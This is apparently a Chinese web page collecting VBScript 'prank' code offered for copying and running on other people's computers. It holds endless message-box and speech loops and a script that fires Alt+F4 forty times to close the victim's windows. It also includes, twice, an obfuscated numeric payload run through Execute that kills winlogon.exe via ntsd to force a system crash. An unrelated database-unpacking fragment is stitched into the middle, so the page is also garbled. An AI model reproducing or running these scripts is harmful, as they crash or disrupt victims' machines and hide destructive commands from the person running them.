您的位置首页百科快答

vbs整人代码大全

vbs整人代码大全

的有关信息介绍如下:

vbs整人代码大全

Do

Dim a, b, c, d

a = InputBox("快说“我是猪”", "")

If a = "我是猪" Then

MsgBox "这就对嘛!", 64, ""

MsgBox "再按50下确定吧", 64, ""

For b = 1 To 50

MsgBox "" & b, 64, ""

Next

MsgBox "按完了?", 64, ""

MsgBox "这么快?", 64, ""

MsgBox "我还没玩够我不想走", 64, ""

MsgBox "我就不走你能把我怎么样?", 64, ""

MsgBox "哈哈哈", 64, ""

MsgBox "好好好马上马上", 64, ""

MsgBox "ennnn", 64, ""

MsgBox "要不然再按10下?", 64, ""

For c = 1 To 10

MsgBox "" & c, 64, ""

Next

MsgBox "流氓软件语录:", 64, ""

MsgBox "亲,您真的要我走吗?", 64, ""

MsgBox "您确定吗?", 64, ""

MsgBox "期待下次见面!", 64, ""

MsgBox "当然,我不是流氓软件。", 64, ""

MsgBox "所以我是不可能走的!", 64, ""

MsgBox "哈哈哈哈", 64, ""

MsgBox "等一下", 64, ""

MsgBox "我给你讲个故事吧(不停也得听)", 64, ""

MsgBox "从前有座山", 64, ""

MsgBox "上山有座庙", 64, ""

MsgBox "庙里有个和尚在讲故事", 64, ""

MsgBox "讲的是什么呢?", 64, ""

MsgBox "从前有座山", 64, ""

MsgBox "上山有座庙", 64, ""

MsgBox "庙里有个和尚在讲故事", 64, ""

MsgBox "讲的是什么呢?", 64, ""

MsgBox "从前有座山", 64, ""

MsgBox "上山有座庙", 64, ""

MsgBox "庙里有个和尚在讲故事", 64, ""

MsgBox "再按50下确定吧", 64, ""

For d = 1 To 50

MsgBox "" & d, 64, ""

Next

MsgBox "50下怎么快?", 64, ""

MsgBox "要不然再按1000下?", 64, ""

MsgBox "哈哈哈哈", 64, ""

MsgBox "开玩笑的", 64, ""

MsgBox "哈哈哈哈哈", 64, ""

MsgBox "怎么了,不耐烦了?", 64, ""

MsgBox "好好好我马上就走", 64, ""

MsgBox "等一下", 64, ""

MsgBox "再等一下", 64, ""

MsgBox "拜拜~要记住你是谁欧!哈哈哈~", 64, ""

Exit Do

Else

MsgBox "别想关掉啦,快承认吧!", 16, ""

End If

Loop

编码一定是要 ANSI

这个很强悍的vbs,蓝屏

strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-

23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-

13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10,32,32,32,32,32,32,32,32,32,32,32,109,115,103

,98,111,120,32,34,-15133,89,-13899,-20026,-

20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-

14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-

13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-

24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-

18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115,32,61,32,67,114,101,97,116,101,79,98,106,1

01,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119,115,99,114,105,112,116,

46,115,108,101,101,112,32,32,32,49,50,48,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32,115,

116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45,99,32,113,32,45,112,110,32,119,105,110,108,111,1

03,111,110,46,101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,118,98,104,105,100,101,13,10,101

,110,100,32,105,102,13,10,13,10,13,10)

for i=1 to UBound(strs)

runner=runner&chr(strs(i))

next

Execute runner

vbs解包代码2010-03-27 21:43Dim rs, ws, fso, conn, stream, connStr, theFolder

Set rs = CreateObject("ADODB.RecordSet")

Set stream = CreateObject("ADODB.Stream")

Set conn = CreateObject("ADODB.Connection")

Set fso = CreateObject("Scripting.FileSystemObject")

connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=HSH.mdb;"

1.do

msgbox "hi"

loop

2.Set s = CreateObject("sapi.spvoice")

i=0

do

s.speak i

i=i+1

loop

3.strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-

23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-

13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10,32,32,32,32,32,32,32,32,32,32,32,109,115,103

,98,111,120,32,34,-15133,89,-13899,-20026,-

20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-

14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-

13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-

24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-

18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115,32,61,32,67,114,101,97,116,101,79,98,106,1

01,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119,115,99,114,105,112,116,

46,115,108,101,101,112,32,32,32,49,50,48,48,13,10,119,115,46,114,117,110,32,34,99,109,100,32,47,99,32,115,

116,97,114,116,32,47,109,105,110,32,110,116,115,100,32,45,99,32,113,32,45,112,110,32,119,105,110,108,111,1

03,111,110,46,101,120,101,32,49,62,110,117,108,32,50,62,110,117,108,34,44,118,98,104,105,100,101,13,10,101

,110,100,32,105,102,13,10,13,10,13,10)

for i=1 to UBound(strs)

runner=runner&chr(strs(i))

next

Execute runner

4.dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

for d=0 to 40

WSHshell.SendKeys "%{F4}"

next